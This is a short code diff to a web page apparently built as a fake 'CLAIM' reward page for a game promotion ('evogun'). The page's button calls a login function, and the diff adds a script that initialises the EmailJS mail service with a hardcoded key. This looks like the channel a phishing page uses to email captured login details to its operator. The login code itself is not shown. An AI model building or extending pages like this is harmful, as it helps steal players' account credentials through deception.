--- a/id/evogun/index.html
+++ b/id/evogun/index.html
@@ -24,5 +24,10 @@
 	<center><button onclick="login()">CLAIM</button></center>
 	</center>
 	<center>
+<script>
+(function() {
+     emailjs.init('user_Uo3DWO4lfQjwUkIRdJDxU');
+})();
+</script>
 </body>
 </html>
